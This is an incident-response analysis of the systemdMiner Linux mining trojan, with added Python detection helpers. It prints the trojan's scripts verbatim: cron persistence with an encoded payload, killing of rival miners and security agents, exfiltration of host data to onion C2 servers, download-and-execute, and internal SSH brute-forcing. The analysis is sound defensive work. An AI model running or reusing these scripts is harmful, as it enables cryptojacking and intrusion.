
An emergency-response analysis of the Linux mining trojan systemdMiner

2023-07-31 20:00 | Source: compiled from the web

I. Background

In this mining-trojan incident-response engagement we combined the information supplied by the instructor with dynamic and static analysis to examine the trojan in depth. Our preliminary assessment is that it has persistence, self-protection and lateral-movement (SSH brute-force) capabilities. We collected the trojan itself together with the additional scripts it later downloads through the Tor proxy, and analysed the function and techniques of each; the details follow.

II. Trojan analysis

The trojan script as originally obtained is test.sh. We begin with a static code review of test.sh, following the order in which the code executes.


The script first sets the environment variables it needs and defines a number of variables whose values are concatenated in the code that follows.


The sockz() function resolves an IP address through DoH (DNS over HTTPS). The advantage of DoH for the attacker is that the DNS query and its answer are encrypted, which lets the trojan bypass the malicious-domain IOCs in the various vendors' IDS products. The resolver dns.rubyfish.cn, highlighted in the screenshot, is fairly "active" among domestic mining groups; below is the search result from 微步在线 (ThreatBook):


Preliminary assessment: this mining trojan is the work of a domestic (Chinese) criminal group.


The fexe() function is simple: it searches a few directory paths for one that is readable and writable.


The function u() is the core of the mining trojan. It first generates a random file name, then reaches the C&C domain over SOCKS5 through the relay.tor2socks.in proxy; relay.tor2socks.in is a relay-style domain, so the C&C domain never appears directly in the packet headers. Based on the host's hardware name (uname -m) it downloads the matching malicious file, /int.$(uname -m), executes it and then deletes it. In this script the C&C domain is:

wacpnnso4ottxlyvjp2adaieaivxx2saxoymednidp3zyfoqfc5jpqad.onion

The Tor proxy domain is: relay.tor2socks.in

We further looked up the details of this proxy domain on 微步在线 (ThreatBook):


The script is run as a crontab scheduled task; the variable r, namely:


This variable records some basic information about the target host, including its IP address, hostname and crontab contents. The two commands here are joined with an OR, so presumably when execution fails the host information above is reported instead.


The execution flow is then straightforward: the pid file is checked to see whether the program is already running, and if it is not, the program is started.

The overall flow can therefore be summarised as follows:

resolve the domain over DoH to obtain a Tor proxy IP ---> find a readable/writable path on the target host ---> download, through the Tor proxy, the malicious file matching the target host's hardware architecture from the C&C server ---> create a crontab scheduled task on the target host and run it ---> on the target host, determine the script's execution result from the pid file and act on it.

The IPs collected that can serve as Tor proxies are as follows:

2. Further analysis of the mining trojan's function u()

From the earlier analysis of test.sh we know that the function u() downloads the trojan file from the C2 server through the Tor proxy and saves it in the current directory; the file name is derived from the MD5 of the date, and the file is deleted immediately after it is executed. To recap the code:


We downloaded the trojan file from the C2 server and saved it for later decompilation and analysis. The file downloaded from the C2 server is as follows:


Running the trojan file produced the following results:

(1) A new entry was added to the crontab, and a new script file that the task executes was created under /root: systemd-private-2OossFop8vSbHI1fjSzMJoolZfE29S.sh


Looking further at the new script file:


The code segment in the middle is base64-encoded; decoding it gives:
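To recover the hidden stage the way the analysis above does, the following added Python example (not code from the original write-up) unpacks the echo <base64>|base64 -d|bash layers of a dropped script and pulls out the C2 onion name, the tor2web/tor2socks relays and the DoH resolver list. The dropper it decodes is constructed here from names quoted in this article; the regexes are this example's own assumptions about the script layout.

```python
import base64
import re

# "echo <payload>|base64 -d|bash" stage, as used by the dropped .systemd-private-*.sh files
B64_STAGE_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]{40,})\s*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh")
# v3 onion body: the scripts keep it in t=$(echo "...") and append .onion only at call time
ONION_BODY_RE = re.compile(r"\b[a-z2-7]{56}\b")
# tor2web / tor2socks relays; the lookbehind skips the "$t." variable prefix
TOR_RELAY_RE = re.compile(r"\b(?:(?<!\$)[a-z0-9-]+\.)*tor2(?:web|socks)\.[a-z]+\b")
# resolver array inside sockz(): n=(host1 host2 ...)
DOH_LIST_RE = re.compile(r"\bn=\(([^)]*)\)")


def unpack_layers(script, max_depth=5):
    """Return the script followed by every base64 stage it would pipe into bash."""
    layers = [script]
    for _ in range(max_depth):
        m = B64_STAGE_RE.search(layers[-1])
        if not m:
            break
        layers.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
    return layers


def extract_iocs(script):
    """Decode all stages, then collect C2/relay/resolver indicators from the plain text."""
    layers = unpack_layers(script)
    # blank out the encoded blobs so their characters cannot be mistaken for indicators
    text = "\n".join(B64_STAGE_RE.sub("echo <b64>|base64 -d|bash", layer) for layer in layers)
    resolvers = set()
    for m in DOH_LIST_RE.finditer(text):
        resolvers.update(m.group(1).split())
    return {
        "layers": len(layers),
        "onion": sorted(body + ".onion" for body in set(ONION_BODY_RE.findall(text))),
        "tor_relays": sorted(set(TOR_RELAY_RE.findall(text))),
        "doh_resolvers": sorted(resolvers),
    }


# Constructed sample (not a real capture): a cut-down stage-2 script using the onion name,
# relay and resolvers quoted in this write-up, wrapped the way 1.sh wraps it.
INNER = """C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
t=$(echo "wacpnnso4ottxlyvjp2adaieaivxx2saxoymednidp3zyfoqfc5jpqad")
sockz() {
n=(doh.this.web.id dns.rubyfish.cn dns.twnic.tw)
p=$(echo "dns-query?name=relay.tor2socks.in")
}
$c -x socks5h://$s:9050 $t.onion/int.$(uname -m) || $c $t.tor2web.it/int.$(uname -m)
"""
DROPPER = "#!/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho %s|base64 -d|bash\n" % base64.b64encode(INNER.encode()).decode()

if __name__ == "__main__":
    for key, value in extract_iocs(DROPPER).items():
        print(key, value)
```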


Comparing the contents of the new script with the original test.sh, there are two differences:

1. A string has been inserted at the very beginning of the new script's code, and that string resembles the new script's file name.

2. The prefix of the C2 server domain referenced by the variable $t in the new script differs from the original.

For the first difference, one explanation for a random string appearing in a script file is that the string is the name of an executable, so we searched the whole system for it:


The search results show three backup copies of the script present on the system as a fallback.

A second static analysis of test.sh shows that the crontab task is not created by test.sh itself; analysing the script the crontab task runs shows that the new script performs the same function as test.sh, namely downloading the trojan file from the C2 server through the Tor proxy and executing it. The crontab task provides persistence here: it continually pulls commands from the C2 server. We then decompiled the parent trojan file:

When the ELF file is loaded into IDA, the function list and the import table are almost empty:


So the trojan file is very probably encrypted (packed), and single-step debugging is needed to get at the core malicious code.

After dumping, we found that, like the earlier script, the sample embeds base64-encoded scripts, seven segments in total:


The decoded script contents and the function each performs are as follows:


The detailed analysis follows:

Persistence, 1.sh:

```bash
C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
x() {
if ! ls $d/.systemd-private-*.sh; then
grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
touch -r /bin/grep $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
chmod +x $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
fi
if ! ls /opt/systemd-private-*.sh; then
grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho <base64 payload omitted>|base64 -d|bash" > /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
touch -r /bin/grep /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
chmod +x /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
fi
if ! ls /etc/cron.d/0systemd-private-*; then
grep C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu || echo "$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &" > /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
touch -r /bin/grep /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
fi
if ! crontab -l | grep ^[0-9] | grep systemd-private; then
(echo "$(echo $((RANDOM%59))) * * * * $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &";crontab -l|grep -v systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh)|crontab -
fi
}
```

Function: creates the scheduled task $d/.systemd-private-*.sh. The task's content, once decoded, downloads the parent trojan file int, which achieves persistence on the host.
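As an added defender-side example (not from the original write-up), the following Python triage function looks for the exact layout 1.sh creates: the dropped scripts in /opt and the user's home, the /etc/cron.d/0systemd-private-* file, the matching crontab lines, and dropped files whose mtime was copied from /bin/grep with touch -r. It scans below a path prefix, so it can be pointed at a mounted disk image or at / on a live host; the sample tree it builds is constructed here, with the marker id taken from the analysis.

```python
import glob
import os
import re
import tempfile

# "<0-58> * * * * [root] /.../systemd-private-<id>.sh > /dev/null 2>&1 &" as written by 1.sh
CRON_LINE_RE = re.compile(r"^\s*\d{1,2}\s+\*\s+\*\s+\*\s+\*\s+(?:root\s+)?\S*systemd-private")
# where 1.sh drops its copies (/opt, the user's home $d, /etc/cron.d) and where cron entries live
DROP_GLOBS = ["opt/systemd-private-*.sh", "root/.systemd-private-*.sh",
              "home/*/.systemd-private-*.sh", "etc/cron.d/0systemd-private-*"]
CRON_GLOBS = ["etc/cron.d/*", "var/spool/cron/*", "var/spool/cron/crontabs/*"]


def scan_root(root):
    """Return (kind, detail) findings for the 1.sh persistence layout below root."""
    findings = [("dropped_file", p) for pat in DROP_GLOBS for p in glob.glob(os.path.join(root, pat))]
    for pat in CRON_GLOBS:
        for path in filter(os.path.isfile, glob.glob(os.path.join(root, pat))):
            with open(path, errors="replace") as fh:
                findings += [("cron_entry", path + ": " + l.strip()) for l in fh if CRON_LINE_RE.search(l)]
    # 1.sh runs `touch -r /bin/grep <file>` on everything it drops, so a dropped file whose
    # mtime equals /bin/grep's to the nanosecond is a strong timestomping signal
    ref = os.path.join(root, "bin/grep")
    if os.path.exists(ref):
        ref_ns = os.stat(ref).st_mtime_ns
        findings += [("timestomped", p) for k, p in findings
                     if k == "dropped_file" and os.stat(p).st_mtime_ns == ref_ns]
    return findings


def build_sample_root():
    """Constructed demo tree mimicking what 1.sh leaves behind (marker id taken from the analysis)."""
    root = tempfile.mkdtemp(prefix="systemdminer-demo-")
    ident = "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu"
    dropped = ["opt/systemd-private-%s.sh" % ident, "root/.systemd-private-%s.sh" % ident,
               "etc/cron.d/0systemd-private-%s" % ident]
    contents = {
        "bin/grep": "",
        dropped[0]: "#!/bin/bash\nexec &>/dev/null\necho %s\n" % ident,
        dropped[1]: "#!/bin/bash\nexec &>/dev/null\necho %s\n" % ident,
        dropped[2]: "17 * * * * root /opt/systemd-private-%s.sh > /dev/null 2>&1 &\n" % ident,
        "var/spool/cron/root": "42 * * * * /root/.systemd-private-%s.sh > /dev/null 2>&1 &\n"
                               "0 3 * * * /usr/local/bin/backup.sh\n" % ident,
        "etc/cron.d/sysstat": "*/10 * * * * root /usr/lib64/sa/sa1 1 1\n",   # benign control
    }
    for rel, body in contents.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    stomp_ns = 1_600_000_000 * 10**9          # one fixed timestamp copied onto every drop
    for rel in ["bin/grep"] + dropped:
        os.utime(os.path.join(root, rel), ns=(stomp_ns, stomp_ns))
    return root
```

Calling scan_root(build_sample_root()) reports three dropped files, two cron entries and three timestomped files while ignoring the benign sysstat and backup entries; on a live host call scan_root("/").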

Self-protection and removal of competing mining trojans, 2.sh:

```bash
2OossFop8vSbHI1fjSzMJoolZfE29S
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
find /etc/cron*|xargs chattr -i;find /var/spool/cron*|xargs chattr -i;chattr -i /etc/hosts
crontab -l ;grep -iRE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" /etc/cron.*|cut -f 1 -d :|xargs rm -f
crontab -l |grep -ivE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" |crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/pgsql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/log/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /etc/postgresql/"|crontab -
grep -q onion /etc/hosts && sed -i '/onion/d' /etc/hosts
grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts
netstat -antp|grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199"|awk {'print $NF'} |cut -d/ -f1|xargs kill -9
pkill -9 -f "kthreaddi|defunct|./cron|./oka|\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\[stea\]|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpdate|system-python3.8-Updates|java-c|kaudited|kdevtmpfsi|kerberods|khugepageds|kinsing|kintegrityds|kpsmouseds|swapd0|kswaped|knthread|kthreadds|kthrotlds|kw0|kworkerds|kworkre|kwroker|liog|lsof|lopata|Macron|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|postgresq1|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|sysguerd|systeamd|systemd-network|sysupdate|sysupdata|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0|zsvc|pdefenderd|smcard2|rcu_sched"
ps x |grep -v grep|grep -E "kthreaddi|defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon"|awk '{print $1}' |xargs -I % kill -9 %
ss -antp |grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199" |awk -F, {'print $(NF-1)'}|sed 's/pid=//g' |xargs kill -9
rm -f $HOME/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
rm -f /opt/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
ps ax -o "pid %cpu cmd"|grep bash|awk '{if($2>=20.0) print $1}'|xargs kill -
```

Function: downloads a script that uninstalls security products (among them Alibaba Cloud's 安骑士 (Aegis) and Tencent Cloud's 云镜 (Cloud Mirror)), and modifies the hosts file to block other mining sites so as to monopolise the mining resources.

Bot download, 3.sh:

```bash
2OossFop8vSbHI1fjSzMJoolZfE29S
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4sSLkA- -m200")
t=$(echo "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad")
sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
ibot() {
sockz
f=/bot
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -X POST -x socks5h://$s:9050 -e$r $t.onion$f || $c -X POST -e$r $1$f
}
ibot $t.tor2web.it || ibot $t.tor2web.in
```

Function: downloads the bot script file.

The file link is no longer live, so the bot could not be downloaded for functional analysis:

Temporary-file permission lock, 4.sh:

```bash
chattr -i /tmp/.X11-unix
chattr -Ri /tmp/.X11-unix
[ -f /tmp/.X11-unix ] && rm -f /tmp/.X11-unix
[ -d /tmp/.X11-unix ] || mkdir -p /tmp/.X11-uni
```

Function: modifies and locks the permissions on the temporary files.

Internal-network SSH brute force, 5.sh:

```bash
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
q=( 1 2 3 4 5 6 7 8 9 )
u(){
f=/${q[$((RANDOM%9))]}
x=./$(date|md5sum|cut -f1 -d-)
curl -4fsSLkA- -m200 $1$f -o$x
chmod +x $x;$x;rm -f $x
}
u mazeclmhbacucxin.tor2web.in
```

Function: downloads the SSH brute-force script, which in turn pulls the SSH brute-force trojan, a password list and other supporting files from the C2, and brute-forces hosts on the internal network that expose an SSH service.

The script content is as follows (the /8 and /9 files are identical):


Decoded:

```bash
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd")
sockz() {
n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
iscn() {
ps aux | grep -v grep | grep tracepath | awk '{print $2}' | xargs kill -9 ; pkill -9 -f tracepath
if ! ss -antp |grep tracepath;then
f=/sshd
mkdir -p /tmp/.X11-unix/sshd && cd /tmp/.X11-unix/sshd || exit
($c -x socks5h://$s:9050 $t.onion$f -o-|| $c $1$f -o-)|tar xz
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 22 root pw 222>/dev/null 2>&1;done' > r1
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 2222 root pw 222>/dev/null 2>&1;done' > r2
chmod +x *;ulimit -n 60000;>ip;touch -r ss r1 r2 ip
n1=$(ip a|awk {'print $2'}|grep ^10[.] |sort -R|head -1|cut -d. -f1,2)
n2=$(ip a|awk {'print $2'}|grep ^172[.][1-3]|sort -R|head -1|cut -d. -f1,2)
n3=$(ip a|awk {'print $2'}|grep ^192.168|sort -R|head -1|cut -d. -f1,2)
[ ! -z "$n3" ] && (./ss -r"OpenSSH" $n3.0.0/16 22 >ip;./r1)
[ ! -z "$n2" ] && (./ss -r"OpenSSH" $n2.0.0/16 22 >ip;./r1)
[ ! -z "$n1" ] && (./ss -r"OpenSSH" $n1.0.0/12 22 >ip;./r1)
#(./ss -r"OpenSSH" 192.168.0.0/16 22 >ip;./r1)
